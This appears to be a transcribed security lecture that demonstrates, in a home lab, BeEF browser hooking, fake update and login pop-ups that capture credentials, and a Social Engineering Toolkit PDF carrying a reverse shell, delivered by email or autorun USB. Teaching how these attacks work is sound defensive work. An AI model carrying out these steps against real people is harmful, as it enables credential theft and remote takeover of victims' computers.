 Welcome back, everyone. Before we really get started, I wanted to give you a demonstration of how hackers can hack. It's not really a demonstration about how to hack necessarily, but just talking about some techniques that hackers can use to take over systems, to get access to systems, what they can do once they actually take over those systems. Yeah, so I just wanted to give you an idea of kind of how easy it is, but also sometimes how hard it is to be able to really take over somebody's computer and be able to use somebody else's computer to do different things, or still information or whatever. So what I'm using to, I guess, take advantage of a browser is, in Kelly Linux, there's a tool called Beef, and it's the browser exploitation framework project. Most, or let's say, a lot of applications are becoming web-based, and that means that people are using browsers as kind of like the main tool, the main tool for accessing their data, accessing information, communication, all of these things go through the browser now. We don't really download a lot of different applications onto our computer and then run those applications, some people still do, but a lot of apps are now available online, and they can be accessed from a browser. Because of that, the browser has become a very common target for hackers to basically get access to things. So one exploit I'll show you, basically I chose this because hacking really isn't very visual. Looking at lines of code or looking at the command line by itself doesn't really show you anything. You can just see commands going on, and most of the time the commands fail, and yeah, so it's not very visually interesting. So I hope what I'm going to show you now is visually interesting for you. So the situation that I have set up is basically taking over someone's browser and then running different code on their browser to be able to basically just run commands on their computer, use their browser to do bad things, steal their credentials, like logins, passwords, things like that. So I just wanted to show kind of how this is working. So I'm using in Linux, in Cali Linux, which you can download. There's also the beef control panel, yeah, and it's fairly relatively easy to use. I'm using it inside VirtualBox as one of my host systems. And the IP address for this system is 1010237. So this is on my internal network. If you try this, don't try it on random people's computers. Set up your own local test network and try it on your own computers. Do not hack other people without their permission, okay? So 1010237 is my local IP address for the, let's say, the hackers computer. I have a web server running on the IP address 1010232. That's where a web server on my internal network, 232. And then I have a Windows 10 computer and it has an IP address of 1010233. Now, to be able to do most of these attacks or to be able to do a lot of these attacks, the victim's computer has to be able to connect back to the attacker's computer. So I need the victim's computer to be able to connect to 1010237. So inside the Windows computer, I'm going to do ping 1010237. And what ping will do is basically send traffic to the computer at 1010237. So 1010237 is a special unique identifier for this computer. And if I can ping it, then that means they can communicate both ways and I can. So most of the time, the attacker's computer would have a public IP address. And that means that any computer on the internet would be able to connect to it. And my internal network, I just need to make sure that the victim's computer can contact my attacking computer. So inside beef, basically this exploits different types of browsers. And whenever you run beef, then it gives you a script. So basically the hook that it wants you to add to some website, whether it's your own website or whether you've hacked a website or taken over a website, you should add this particular hook in there. And this IP address is the IP address wherever I'm hosting this hook.js software. And this is just JavaScript code that basically gets injected into a web page. Okay, if you don't know about JavaScript, you don't really have to know how to code JavaScript, but the point is that whenever you load up a website, code also gets loaded with that website. So what we're essentially doing is adding this code or this script to a website. And once we do that, then we can use that code to kind of take over the browser. That's the goal at least, okay? So whenever I start up beef, it gives me this hook script location. And then I have actually, let me show that real quick. So I've created a web page on my server called Test HTML. And Test HTML, if you can see this, let me blow it up a little bit. Test HTML is just HTML body and then this malicious script pointing back to our attacker's workstation on port 3000 to hook.js. And then just some text that says this is a bad web page and then it has a link to a website, that's it. Okay, so next we need to, basically, once I have that web page up, I need to get somebody to actually visit that web page. And once they visit that web page, then if they're using a vulnerable browser, then they will be attacked. So I have actually Internet Explorer, so on Windows, this is Internet Explorer open. And I'm using Internet Explorer specifically because a lot of Koreans still use Internet Explorer and a lot of websites require you to use Internet Explorer, but it's still quite vulnerable. So really, websites should be upgrading their software, so users don't have to use Internet Explorer anymore and that least can move to Edge. But Microsoft Edge and Internet Explorer are actually quite different. Internet Explorer has a lot of vulnerabilities, but yeah. So anyway, I'm using Internet Explorer now just to illustrate hacking essentially. So we need to go to the malicious website, sorry. So 10, 1, 2, 3, 2, test.html. So this is the malicious web page. Now, if you just went to this web page, this is a bad web page with a cool link. But it just looks like a normal web page, actually. You don't see any malicious code. Nothing is really going on, nothing too strange, right? But you notice back in our control panel, we now have online browsers. We have a browser that's hooked and it looks like a Windows browser, Internet Explorer, and we get some information about it. So if I click on this, that means that because we've hooked it, this browser can now be controlled from the beef control panel, okay? So if we look down here, beef gives us information about the browser. So browser name, Internet Explorer, version 11. So Internet Explorer 11, the UA string tells us quite a bit, or I thought it did. No, I was looking at language. So for example, E in US, that's the default language. There's a shockwave flash installed. Looks like it's on Windows. So flash, yes, WebSockets, yes, no WebRTC, session cookies, yes, persistent cookies, yes. And then a little bit more information about hooked, about how it's hooked. So this is just giving us information about the browser. And all the user had to do was go to this webpage, right? So I can send, let's say I shared this webpage on Facebook. Maybe a lot of people would have clicked on that link and now as long as they stay on this webpage, I potentially have access to a lot of their browser functions, okay? So now we can start to try to do things with the computer, okay? So I will go to, now that I have the browser hooked, I will go to the Commands tab. And under the Commands tab, let me expand this a little bit. So under the Commands tab, there's a lot of different things we can do. So first we'll look at browser and we can try to detect a lot of different types of software installed on the computer. And the reason I might want to detect different types of software is because I might want to take advantage of a vulnerability in that software or send a file. So for example, if I can detect Microsoft Office is installed on a computer, then I know I can send data, I guess, to that computer, or an attack to that computer that might compromise the system, okay? So next, let's see, detect toolbars. I can see if there's any vulnerable toolbars on here, VLC, a media player. We can do browser fingerprinting, remove hook, try to get access to webcams. Again, I'm in a virtual environment, so that kind of stuff doesn't really work. Detect ActiveX, that might be useful if I want to send an ActiveX attack or vulnerability, detect pop-up blockers. So if a pop-up blocker is installed and enabled, then certain types of attacks won't work. So I might do, I might run these commands very quickly to just make sure or kind of get more information or intelligence about the computer and how it's connected. We can also try to get cookies for the domain, which is information about, for example, logins, potentially, session storage, yeah. Let's see, so what I want to do next, oops, what I want to try to do is Chrome extensions, we're actually attacking Internet Explorer, so we don't need to use Chrome extensions. If we look at exploits, exploits mostly deals with taking over different types of firewalls, home routers, things like that. NAS devices, ActiveX command execution, so if ActiveX is installed, if this browser has ActiveX installed, then we can do that. Taking over cameras on the local network, not the camera in the computer, and then a couple other things. Let's see, I was looking for hosts, so again, more intelligence gathering, trying to get the location, getting the internal IP, so I might be able to get the internal IP of the computer, and then I would know what IP range is potentially to attack. Okay, so once the browser is hooked, we can go through and get some intelligence information about the browser, about the computer, and one thing that I want to do is if, or want to say, I guess, is if the user, let's say they click on this link and they browse away from my web page, then eventually, if we refresh this, if we refresh, then the browser should go offline, or it should show up as offline. That means it's no longer hooked and I can no longer take it over. Right, okay, it's going to take a while before it registers. So, if we go back, so now the browser is on the web page, again, the infected web page, so we still have the online browser, one of the things I want to do is to be able to keep some sort of persistence, right? So, what I can try to do is go to browser and hook domain and then do something called redirect browser. Let me try to expand this. Redirect browser with an iframe, okay? So, redirect browser iframe and then give it the IP address of this local computer, which was 237. So, 10.1.0.237 and then we want to redirect to, let's say koreatimes.com. Okay, so let me pull this over a little bit. Now, watch what happens to the test web page whenever I click execute. So, this is the attacker's computer, this is the victim's computer. So, if I click execute, then you notice that it's redirected the victim's computer to koreatimes.com. However, if you look in the address bar, you can still see the infected or the malicious website, right? So, it just redirected but it's using something called an iframe to show koreatimes.com while still giving the attacker access to the system. So, now the attacker or the victim, I should say, can click on any of the stories and view all the stories but look, the domain is still the same. So, if I'm the attacker, I can still run any of these commands against the suspect. So, now that I've kind of got the victim, now that I've got the victim in, I guess, a bad place, I've taken over their browser and I've redirected them to a website. So, now hopefully they'll take time to read a story and I can try to take over their system while we're doing it. I can go in and try to do things like looking at the host. I want to detect if this computer is actually in a virtual machine. So, is the victim running in a virtual machine or not? Now, why would we be interested in that? If I click execute, click on the command, result, virtualize. So, this computer is in a virtual machine and we know that because of the height and width is non-standard. So, the reason I might want to do that is because maybe somebody is going to my website like an antivirus company and testing my website for malicious code. Well, if it's in a virtual system, if it's in a virtual machine, then I can know that something strange is going on and not run the attacks. So, we can do a lot of different things. Let's see if the tech software shows anything interesting. Probably not because there's not really much installed tech software. Yeah, okay. Physical location won't work. System info might work. Yeah, it's not going to work. Okay, so there's a couple of other things that I can do. A lot of these will only work on maybe older browsers or specific types of browsers or particular plugins in a browser. So, we've already so far taken over the browser and then redirected the user to a web page that just looks like a normal web page. They can browse around a news website or Facebook or whatever it is. Imagine that I sent you a link to Facebook and then you logged in and I, you know, you kept Facebook or you kept your mail up the entire time. I could still be, I guess, attacking your system. If we go into, so what I really wanted to show was social engineering. So, imagine that you're viewing this news website and everything looks normal. And this is a little bit suspicious, but I would use a different name or domain name if I'm looking at this. And you're reading this story about Indian head peak, I don't know. You're reading some story. Then, all of a sudden, the user wants to try to steal your Facebook credentials, your Facebook passwords. So, we can do something called simple hijacker and then choose the template we want, where was it? Let's do fake flash update actually. So, maybe Korea times uses flash flash. So, we can do something like 10.1.0.237, was it? And then we have a payload and then this is basically a program that we want the user to download. Okay, so while the user is looking at pictures of rocks and things like that, then we can execute this command. And then all of a sudden Adobe Flash Player is available. Do you want to install it? Well, you click install and then whatever I, whatever program I put in this location, the user will download it. So, if I just call it Adobe Flash Player, then most people would save it and install it onto their computer, but it's actually a virus, right? So, this is called Beef Master Zip. Obviously, that's not something that a user should download and install. And it could be called Flash Player. So, it looks like it's a legitimate download. Again, let me execute that. I'm gonna cancel this. If I execute that again, look at how realistic this looks. I mean, this looks like it's probably Facebook and most people are trained to just kind of install. So, most people would install this and really they shouldn't be downloading and installing that. But if you're just browsing this webpage and that pops up, you'd probably install it. Let's look at another one. So, let's say Google Phishing, for example. So again, I need to put in the attacker's IP address. Most of the time, it's not gonna be the attacker's actual computer, but 237, okay? Gmail logout, okay, execute, and then it has redirected us. So, let's say it went to the news website and then after a little bit, you got redirected to a Google Mail login. So, then you have to put in your username again and I'll just say test, and then password test 123. And then sign in, would you like to store your password? Nope. And then enter your email or phone number, and this is actually at Google.com. So, look at it before, it was at 10-0-1-2-3-2. Yeah, well now I need to go do the thing again. It was at 10-1-0-2-3-2, and it was asking for your Google credentials. So, now if we click on this, you can see result, username, test, password, test 123. So, if somebody actually put in, they were trying to access a webpage for a news website, and they got asked for their Google login information, now the attacker has it, and then it redirects you to real Google, and most people wouldn't be able to tell the difference, okay? So, now that the user's actually back at 10-1-0-2-3-2, now I need to actually redirect them again. All of this can be scripted, but I'm just going through and showing you kind of how it works. Hooked domains, I want to redirect browser to iframe. Again, put in the attackers IP address, and redirect them to creatimes.com, okay? Execute, so now they're on a malicious website again. Now, imagine that I could make a blog or a website and that blog or website could basically point to a malicious webpage that automatically redirects you. So, in that case, anyone who goes to my initial webpage and clicks a link would automatically get kind of hacked, and then I could redirect them to different websites. Again, look at the domain. The domain is the giveaway here. And it's actually creatimes.com, but the domain does not match. So, we go to another webpage. Let me go back to attacking and go to, for example, pretty theft. Pretty theft is a funny one, because let's say we can choose from Facebook, LinkedIn, Windows, YouTube, Yammer, iOS, generic, whatever. And if we do Facebook, for example, like most people have a Facebook account. Now, stealing a Facebook account by itself maybe isn't that interesting, because Facebook does a lot of checks whenever you're trying to log in from an unknown IP address. But if I can use your browser, if I can take over your browser, then maybe I can log in as you from your browser. That might be possible. So, two, three, seven, okay? So now, again, I'm looking at news, I don't know what news this is. I'm looking at it and I execute. Then it asked me, Facebook session timed out. And this looks legitimate. And a lot of news websites have Facebook, like Facebook, the icon is right here. So, it kind of makes sense, like the user is just thinking, man, I need to log back into Facebook if I want to view this. And if I click anywhere else, it doesn't go away, right? So, I kind of have to enter it. So, I just put in test and test one, two, three, four. Log in and then I'm back to the webpage, no problem, right? So, it doesn't seem like anything happened. But if I go back to the suspect computer and I look at the command, then the answer was test, test one, two, three, four. So, now I have your username and password. That's why two factor authentication, like for example, phone numbers or key fobs or one-time passwords are so important. Because if I can steal this information, I can log in as you, unless you have a second factor. Then I would also have to take over that second factor and it's a little bit more difficult. There's a lot of other things we can do in here. Those were kind of the most visual, so I thought I would show them. Notice that a lot of these social engineering ones, there's a lot in social engineering. There's a lot that takes over, if we look at exploits, there's a lot that takes over wireless access points or the kind of the gateways that are very common and tries to change passwords or turn on services that let you take over the gateway. If you can get remote access to a gateway in a network, then you can potentially take over all of the computers in that network or redirect traffic or whatever it is you want to do. So, there's a lot of different attacks that we can do and a normal user would just browse the website like normal and wouldn't most of the time wouldn't really know. So then if they're just browsing through, all of a sudden Facebook login pops up and they would put their information in and that would be it. Now, there are some things that websites can do to try to prevent this, but obviously Korea Times doesn't block iframes and things like that. So, there are things that websites can do to try to block this kind of thing, but this is very common and most people wouldn't really think about it whenever they're just browsing through the internet. Or if they're sent a link, maybe even from somebody that they don't know, the link might point to a malicious website that redirects them or does an iframe that redirects them to a legitimate website. So, even though it looks like a legitimate website, it's actually kind of taken over by a malicious website. So, there's a lot of frameworks that let us do a lot of different things, basically. Let's see if we can get it cookie, maybe not. So, there's a lot of frameworks. Oh, yeah, okay, so that's just the beef hook cookie. So, there's a lot of frameworks that help us to be able to take over and kind of manipulate users, especially through the browser. Another thing that I wanted to show, but I don't think I have time. Yeah, I don't have time. Another thing that I wanted to show is a tool, let's see, social engineering tools. So, social engineering, it's called the social engineering tool kit. Really, I guess, easy to use and it can do a lot of attacks as well. So, for example, select what you want to do, social engineering attacks. Yeah, we want to do social engineering attacks. So, let's do one social engineering. I want to do a infectious media generator, right? So, basically generating files with malware inside of them. So, I click three. And then the type of exploit that I want to run is a file format exploit. So, one, IP address for the reverse payload. I enter the attacker's IP address. And then the payloads that are currently available are all of these. Now, some of these will work better than others, depending on who your target is or who the target is. But, for example, maybe Adobe PDF Embedded EXE social engineering. I can tell you that Windows, what was it called? Windows Defender, Windows Defender. Yeah, Windows Defender does detect Adobe PDF Embedded EXE social engineering. But, basically, what this does is creates a PDF with an embedded executable that is malicious. So, if you open up that executable, then, or if you open up that PDF, then your computer will be kind of infected and the attacker can take it over. So, let's just generate that because if somebody receives a PDF, they're very likely to open it, right? And if they don't have an antivirus installed or some sort of way to check it, they'll probably fall victim to it. So, we'll do 13. I can use my own PDF for the attack. So, if I already have a document that I want to send somebody, I can use that or I can use a blank PDF. People will probably open it either way. So, I'm going to generate a blank one. And then this is the type of reverse shell that I can create or the type of connection back to my computer. So, what this does is basically says if the victim opens up the PDF, make the victim's computer connect back to the attacker's computer. That way, the attacker can maybe upload files or steal information or whatever they want to do. They basically get full access or almost full access to the computer at this stage. So, let's just do a normal reverse TCP shell. Then I put in the suspects password again or IP address, sorry. And then the port that I want to connect back on and 443 is for HTTPS. So, it's expecting kind of encrypted data and a lot of firewalls don't block 443 outgoing or don't even check 443 outgoing because it's very common that traffic is flowing over 443. So, we'll keep that. And then now, hopefully my virtual machine doesn't crash, but it's generating the PDF with a malicious executable inside of it. Now, like I said, if you're using a halfway decent antivirus on Windows, then this malware should be caught. But that being said, if you're using an older system, if you don't have an updated antivirus, maybe it won't be caught. And that means that whenever you run it, especially if you're using Adobe or an older version of Adobe Reader, then your system could be taken over. So, now it's generated the PDF inside our root.set folder. And yeah, we can go in there and it says, do you want to create a listener right now? We'll say yes. And then it will open up Metasploit and start a connection. And then it will just sit there listening for connections to come in. So now, once that's ready, all I have to do is let's go back. If I do, I'm in the set directory. So if I go to Auto Run, there's this Auto Run IMF. So if you put this on a USB stick or a CD or something like that and give it to somebody or drop it in front of their office, then whenever they insert that USB stick into their computer, then Auto Run will automatically open up this PDF. Or you can just email this PDF to them. It might get flagged by an antivirus, but you could email it in some way to them. And whenever they open up this PDF document, then their computer will make a connection back to your or the attacker's computer. And once that connection has been made, then the attacker basically has full access to your computer. So these attacks are really common. Basically, people generate these malicious files, and then they just sit there waiting for people to click on them. And it works pretty well, actually. Another way is to take over a vulnerable website and then inject some malicious code into that website. So that way anyone visiting that website, you can take over their browser just like we did before. Just like we did before. Yeah. So what can the users do about this? Well, not much really. I mean, some of this, like for the PDF, for example, the thing that the user can do is not open PDFs from people who they don't know, or make sure that they scan every PDF before or open PDFs on maybe a virtual system, not your main computer. So if you're getting emails, for example, from a public email address for sales or something like that, then have a virtual computer that receives those public emails that you can open up documents in that's non-persistent. Then any information that's actually needed, you can forward that on whenever you need to. In terms of browsers, the best thing you can do is install a browser that automatically updates like Chrome, like Firefox, maybe even Edge, but make sure you're always using the newest browser. Chrome has a lot of built-in security features. All of them are thinking about security a little bit more. I think Chrome, through a couple of the tests, Chrome usually comes out pretty good in terms of security, although it is vulnerable to certain types of things. Also be aware of different vulnerabilities inside plugins for each type of browser. So browser plugins can leak data. They can have errors, and instead of attacking the browser, we can attack the plugins instead. So going over all of the different types of attacks that hackers can do would take a very long time, but I hope you've gotten an idea of basically how attackers somewhat can manipulate your computer, even if you're not necessarily going to really bad websites. If they can take over a website that you do go to, then they can still potentially get access to different parts or information on your computer. And it's relatively easy to do, and all the tools I used were also free. I'm not condoning going out and hacking people, but especially for security researchers, you have to know at least generally how these kinds of attacks work. So I hope that was an interesting introduction into basically what some of the things that hackers can do are and some of the tools that are out there. So thank you very much.